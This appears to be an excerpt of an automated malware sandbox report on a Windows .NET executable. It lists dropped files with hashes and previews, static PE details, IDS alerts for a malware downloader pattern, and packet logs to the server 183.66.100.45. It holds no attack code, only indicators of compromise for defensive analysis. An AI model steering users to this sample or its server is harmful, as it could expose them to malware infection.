SSDEEP:	192:R6l7wVeJ41mg6Y2DrSogmfdYpNprf89byIof0mm:R6lXJan6YWSogmfd+wy3fs
MD5:	DD96014D189C47645344A213812E67BC
SHA1:	675451C70C0EA0D11A53BB37DC87FE0BD714A9AB
SHA-256:	0DC6A8465C1C0067B44D8DB5B148B5E2B665B1E0066B82CA1FEB0618C3C9B07A
SHA-512:	419174A599EB792BFD71B79BB0B8E543D1AD33BBA9DD0E2970883C15C7681AC8E6C374D15651A077BC0E57CBE8FB197D92AFC6614A52B8CBE5018FCD76CCD1A6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA385.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4808
Entropy (8bit):	4.545659562291773
Encrypted:	false
SSDEEP:	96:uIjf6I77k17VSJ/DmDEqDAi0HGDSO+DSjd:uIeYQ178/i9JleO+eR
MD5:	98C3E29AE31B3861B9B667047E1FEAEB
SHA1:	F3A12E749485C1590B1CE4578800F8056CE1B92D
SHA-256:	C6537524B61096398A5831E306C94C33772486D92E4FD2DE6CF865FFC924C056
SHA-512:	3078437D9BC837E5E590060ACC1E86E61BC778472B4F64A8BCC2F2E0F7F118C404C0EBF1C109CA454A4E083A87E038EAE217162D347CF9E6D93C3D9200EEB3C8
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="678458" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA875.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jan 16 12:35:37 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	162068
Entropy (8bit):	1.6609786363360843
Encrypted:	false
SSDEEP:	768:BRtbSDC1QOEoXe1cQLwUyCbAYey1aAwNbxs:Z17bQLwUtAbNby
MD5:	A012BF50D5F92A5678BD64A6B7E1DB7A
SHA1:	7254EB3D027C9D6C36688EE16AE342D28D3D3306
SHA-256:	438035EC577D01A096326C7D7CDE03BFECAD5E5894A5D650F4A2E30501B6B165
SHA-512:	F478686353E499DFE7685D33FF2B43DC5443FB24D56C84D567D92A4AF7A87983323CFFEF6003EE61AA186705C36C2EC2564BC7E63D2AF2313EF06ABE5ABB5999
Malicious:	false
Preview:	MDMP..a..... ..........g........................d...........$...,'......$...Hb..........`.......8...........T............3..tE..........P'..........<)..............................................................................eJ.......)......Lw......................T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA970.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	7076
Entropy (8bit):	3.724003300963531
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbi6KBFoYzvAQ8z+vv5aM4UM89bAq4nhufOAm:R6l7wVeJi6KEYMxSprM89bAqNfOAm
MD5:	C29E76D328ADE5CD765F529295537D81
SHA1:	08AAE652ADE3B398ACF01A64EFC3594225CF308B
SHA-256:	68A829CA957676896DA77F8DBC486EF4EF563DCA718418D0450DB6FE07C9986E
SHA-512:	E6B0842A65F50C8598253246F0A615210369E5E92BD9B666FD990F8D9FCC079DBEAA3DD1C657FCB02ED603DF072755BE8D205AC24955E49C713B1D1A95F51DF0
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9CF.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4877
Entropy (8bit):	4.489168412574954
Encrypted:	false
SSDEEP:	48:cvIwWl8zs8Jg771I92k8WpW8VYgYm8M4Jd1+FeFUyq8vo1ghy7+3SDwMJd:uIjf6I77k17V0JdfUWoyhy7+iLJd
MD5:	C5F53FD539759DE9E1E28C65C1358344
SHA1:	6C35722EB3526A479126F30D8B45EF8E9901BF83
SHA-256:	BEA380D18ADD7E8F272C35D7B3C640574E753925E0CDD30E28DCEAA0A17C19CC
SHA-512:	E54EC47B1CD70CA2F31A8FAC920C25D4368A012D91EBDBE8CB91BC8F0581D8E241D2747B59D463EDD2DD3D763D05A72E4F9FBA26C931E8D8B7E3CAA829FEC4F0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="678458" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\sys.key

Download File

Process:	C:\Program Files\Weekplus\GamePlusPlus.exe
File Type:	data
Category:	dropped
Size (bytes):	432
Entropy (8bit):	3.671581767054914
Encrypted:	false
SSDEEP:	6:xKbW0i3Palnx6fKrpMKbW0i3Palnx6fKrpMKbW0i3Palnx6fKFmMKbW0i3PalnxJ:4W0A2MMpHW0A2MMpHW0A2MAKW0A2M2
MD5:	33BA2939094171F1DFD8B1CB546866E4
SHA1:	E78A4D67FB56A58A8BAD00BDF4D830BE6D453676
SHA-256:	BE472FA84B13D108C872193F53D8BEA3B6AECD8C66EDAF04C22532981A145F74
SHA-512:	5930B59C9D6B54E99888C45FAEC37CAA4669064210D85BE239267EE0381B9DAFC766BFACBFC2ABF4F4D3B252E8B41942D2AC9EDF53D20CB6787755ECC64FB5BC
Malicious:	false
Preview:	....[..h..:.].P.r.o.g.r.a.m. .M.a.n.a.g.e.r.....[..e..:.].2.0.2.5.-.1.-.1.6. . .7.:.3.5.:.3.6.....[..Q.[:.].....[..h..:.].P.r.o.g.r.a.m. .M.a.n.a.g.e.r.....[..e..:.].2.0.2.5.-.1.-.1.6. . .7.:.3.5.:.3.6.....[..Q.[:.].....[..h..:.].P.r.o.g.r.a.m. .M.a.n.a.g.e.r.....[..e..:.].2.0.2.5.-.1.-.1.6. . .7.:.3.5.:.3.7.....[..Q.[:.].....[..h..:.].P.r.o.g.r.a.m. .M.a.n.a.g.e.r.....[..e..:.].2.0.2.5.-.1.-.1.6. . .7.:.3.5.:.3.9.....[..Q.[:.].

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\APP.exe.log

Download File

Process:	C:\Program Files\Weekplus\APP.exe
File Type:	CSV text
Category:	modified
Size (bytes):	4323
Entropy (8bit):	5.357603975270794
Encrypted:	false
SSDEEP:	96:iqbYqGSI6ozajtIzQ0cxYsAmSvBjwQYrKxmDRtzHeqKkCq10tpDuqDqWiNLyUII:iqbYqGcRIzQ0JyZtzHeqKkCq10tpDuqO
MD5:	08033DD1B6AF9F568AD463F0FC221C26
SHA1:	E2E28C4EF889C389013E3FBA70C699C0A84CD6A7
SHA-256:	54A73B6F54ADEB20602D83D810EEF5BD287E24631B3B7C9100F2408A17E4BA9A
SHA-512:	985B4EEE182DAE5C3761A4AA2702C3006F84C3F901F9FA30FB391E2A35D2C118ED2FCDF9C9022B9DB675D6D129E6F000658E8E892D0AB56923DFF1D761B91158
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"Microsoft.PowerShell.Commands.Diagnostics, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\37a5ed6e6a6a48d370ee34b13c3e2b37\Microsoft.PowerShell.Commands.Diagnostics.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2anqrhei.ivv.ps1

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rehrozc.cfv.ps1

Download File

Process:	C:\Program Files\Weekplus\APP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddficppj.s0w.psm1

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbrbr3lf.t5x.ps1

Download File

Process:	C:\Program Files\Weekplus\APP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mc31lfww.urj.ps1

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtawwo2r.1un.psm1

Download File

Process:	C:\Program Files\Weekplus\APP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zgb05j44.aeu.psm1

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztg4uy4r.vp5.psm1

Download File

Process:	C:\Program Files\Weekplus\APP.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4719254024362405
Encrypted:	false
SSDEEP:	6144:HzZfpi6ceLPx9skLmb0fvZWSP3aJG8nAgeiJRMMhA2zX4WABluuNwjDH5S:TZHtvZWOKnMM6bFpqj4
MD5:	FA718B8D084229EBD944F47776CF6902
SHA1:	0B4CBDF9313E53666F11AB44F1813EC901D28353
SHA-256:	5307BAD1632B276DBAAD0486D2329136423926F3D033391773E8B1E524B37B52
SHA-512:	D31D7012736F1F1653D840C8FA7B47BEA722C50CBB7AC3858119E7DC4FADA8E2E85B183CC26FC559B6CE24B15B529FCCAF7E569081FE2710EF0AA4D4AF477CB6
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..#.h..............................................................................................................................................................................................................................................................................................................................................s..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.997342205642334
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	#U6c47#U8054#U652f#U4ed8.exe
File size:	23'566'848 bytes
MD5:	eabc234727934ad76f332e7cfb28c80b
SHA1:	c89d84a40075a2c53da3be5eb17e3fd95d6b7cc8
SHA256:	5e1d7275b0abd484c15f186690db73c42e861311da3f5f048563636336933b4a
SHA512:	2e95938c113543483b53517304a8494411b07174a2f349d89f7a376108ae8f0ac92d990adad1ac34e5a9eba007beb7d5d5c89f5e6dbc764b360aa2966ce9d3ac
SSDEEP:	393216:m24IY5EzejkCerI8v6sN4hd79bb/wwDkbHdj3LHvFN0eW/Lw4e:m5Ib2kCe0e67jZJwHh3LPFN7
TLSH:	353733B82082C178529EDA5899117E3CD493FE15BF6FBE9C20AC75EF5072353822563B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...7..g.........."......Xg..@........... .....@..... ........................g...........@...@......@............... .....

File Icon


Icon Hash:	cc17332d29339ee0

Static PE Info

General

Entrypoint:	0x140000000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67831B37 [Sun Jan 12 01:30:31 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1678000	0x3f88	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x167773c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x16757d6	0x1675800	7391d0a8df6be6683c546d9408378b0e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1678000	0x3f88	0x4000	f3e91f10f5d04f1af9b9c5faedf430d6	False	0.4716796875	data	5.161049875986901	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x16783d0	0x3228	Device independent bitmap graphic, 64 x 128 x 24, image size 0, resolution 3780 x 3780 px/m	0.4749221183800623
RT_GROUP_ICON	0x167b5f8	0x14	data	1.25
RT_VERSION	0x1678130	0x2a0	data	0.44642857142857145
RT_MANIFEST	0x167b610	0x978	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.44636963696369636

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-16T13:35:14.883198+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49728	183.66.100.45	443	TCP
2025-01-16T13:35:17.098130+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49745	183.66.100.45	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 13:35:08.024574995 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:08.024682999 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:08.024780035 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:08.044773102 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:08.044817924 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.449301004 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.449400902 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.450822115 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.450903893 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.454818964 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.454847097 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.455355883 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.503810883 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.515695095 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.559370995 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.888493061 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.888540030 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.888550043 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.888657093 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.888674021 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.941329956 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.972130060 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.972151041 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.972183943 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.972193956 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.972244024 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.972296000 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.972320080 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.972321033 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.972371101 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.975081921 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.975186110 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.975202084 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.976973057 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.977072954 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.977096081 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.980175018 CET	443	49710	183.66.100.45	192.168.2.6
Jan 16, 2025 13:35:09.980268002 CET	49710	443	192.168.2.6	183.66.100.45
Jan 16, 2025 13:35:09.980282068 CET	443	49710	183.66.100.45	192.168.2.6
